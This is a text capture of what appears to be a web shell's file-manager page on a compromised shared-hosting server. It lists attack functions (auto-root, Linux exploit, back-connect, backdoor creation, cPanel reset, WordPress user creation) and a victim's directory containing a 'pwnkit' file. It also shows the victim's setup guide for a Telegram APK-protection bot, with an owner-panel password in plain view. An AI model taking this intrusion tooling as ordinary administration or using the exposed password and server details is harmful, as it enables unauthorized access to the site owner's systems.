Linux s3.cpanelhost.co.in 5.14.0-611.49.2.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Apr 30 09:05:08 EDT 2026 x86_64
LiteSpeed
: 65.108.44.247 | : 216.73.216.199
Cant Read [ /etc/named.conf ]
7.4.33
teac11783
Bypass.pw
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
Backdoor Scanner
Backdoor Create
Alfa Webshell
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
teac11783 /
dexprotection.teacherslex.site /
slex-ai /
[ HOME SHELL ]
Name
Size
Permission
Action
data
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
php
[ DIR ]
drwxrwxrwx
python_bot
[ DIR ]
drwxrwxrwx
temp
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
README.md
3.85
KB
-rw-rw-rw-
SETUP_GUIDE.md
2.84
KB
-rw-rw-rw-
TEXT.txt
2.36
KB
-rw-rw-rw-
admin_panel.php
15.81
KB
-rw-rw-rw-
analyze_response.py
882
B
-rw-rw-rw-
bot.php
15.29
KB
-rw-rw-rw-
config.php
2.77
KB
-rw-rw-rw-
cron.lock
39
B
-rw-r--r--
cron_log.txt
54.55
KB
-rw-r--r--
db.php
652
B
-rw-rw-rw-
debug_response_1780694966.txt
4.92
KB
-rw-rw-rw-
demo2.apk
9.07
MB
-rw-rw-rw-
demo2_PROTECTED.apk
13.52
MB
-rw-rw-rw-
error_log
9.97
MB
-rw-r--r--
find_runtime_field.py
1.04
KB
-rw-rw-rw-
fonts.php
1.45
KB
-rw-rw-rw-
heartbeat.php
940
B
-rw-rw-rw-
hello.txt.txt
0
B
-rw-rw-rw-
independent_admin.php
12.22
KB
-rw-rw-rw-
independent_cron.php
4.15
KB
-rw-rw-rw-
login_page.html
6.24
KB
-rw-rw-rw-
options_page.html
50.62
KB
-rw-rw-rw-
owner_panel.php
17.18
KB
-rw-rw-rw-
php0.zip
22.38
KB
-rw-rw-rw-
php1.zip
30.73
KB
-rw-rw-rw-
points.php
10.2
KB
-rw-rw-rw-
poll.php
2.07
KB
-rw-rw-rw-
protect_apk.py
9.31
KB
-rw-rw-rw-
protection_page.html
50.33
KB
-rw-rw-rw-
pwnkit
0
B
-rwxr-xr-x
set_webhook.php
430
B
-rw-rw-rw-
setup_webhook.php
1.42
KB
-rw-rw-rw-
slex-ai_function.php
5.6
KB
-rw-r--r--
test_dex.py
11.48
KB
-rw-rw-rw-
test_env.php
6.39
KB
-rw-rw-rw-
test_new_domain.py
1.66
KB
-rw-rw-rw-
test_protect_demo2.py
6.22
KB
-rw-rw-rw-
upload_response.html
118.23
KB
-rw-rw-rw-
wingo_cron.lock
0
B
-rw-r--r--
wingo_sync_auto.php
28.18
KB
-rw-rw-rw-
worker.php
17.25
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : SETUP_GUIDE.md
# DexProtectX Commercial Bot — Setup Guide ## Folder Structure (php/) ``` php/ ├── config.php ← Main configuration (edit this first!) ├── db.php ← Database auto-setup ├── points.php ← Points logic (hold/deduct/refund) ├── fonts.php ← Font management ├── bot.php ← Telegram webhook (main entry) ├── worker.php ← Background APK protection worker ├── heartbeat.php ← Heartbeat pinger ├── owner_panel.php ← Owner web dashboard ├── setup_webhook.php ← One-time webhook register └── .htaccess ← Security rules ``` ## Step 1 — Edit config.php ```php define('OWNER_ID', 7554081592); // Your Telegram numeric ID define('BOT_TOKEN', 'YOUR_BOT_TOKEN'); // From @BotFather define('DB_NAME', 'dexprotect_bot'); // Your MySQL DB name define('DB_USER', 'root'); // MySQL username define('DB_PASS', ''); // MySQL password ``` ## Step 2 — Create MySQL Database Create a database named `dexprotect_bot` on your hosting. Tables will be **auto-created** on first run! ## Step 3 — Upload to Server Upload the entire `php/` folder to your hosting (e.g. public_html/php/) ## Step 4 — Register Webhook Open in browser: ``` https://yourdomain.com/php/setup_webhook.php?url=https://yourdomain.com/php/bot.php ``` ## Step 5 — Open Owner Panel ``` https://yourdomain.com/php/owner_panel.php Password: slex@owner2024 (change in owner_panel.php line 9!) ``` --- ## How the System Works ### Roles | Role | What they can do | |-------|-----------------| | Owner | Add admins, add points, see all stats, upload fonts | | Admin | Use bot to protect APKs (costs 200 points each) | ### Points Flow ``` Owner adds points → Admin's balance increases Admin sends APK → 200 pts put ON HOLD (can't use held points!) APK processing → Points stay on hold APK ready ✅ → Points DEDUCTED from balance APK fails ❌ → Points REFUNDED back (hold released) Timeout 30min ⏰ → Points AUTO-REFUNDED ``` ### Bot Commands **Admin Commands:** - `/start` — Welcome + balance - `/balance` — Points balance - `/stats` — 24h protection stats - `/history` — Last 10 jobs **Owner Commands (in bot):** - `/addadmin [telegram_id]` — Register new admin - `/addpoints [id] [amount]` — Give points to admin - `/listadmins` — List all admins - `/listfonts` — List all fonts - Send TTF/OTF file → Auto-uploads font ### Font System - 10 fonts pre-loaded (Roboto, Open Sans, Montserrat, Lato, Poppins — Bold & Italic) - Owner can upload custom fonts via bot OR owner panel - Bot auto-detects font keywords in APK name and renames output accordingly ### Per APK Cost - `200 points` per protection - Points go on hold when job starts - APK must be ready within **30 minutes** or auto-refund
Close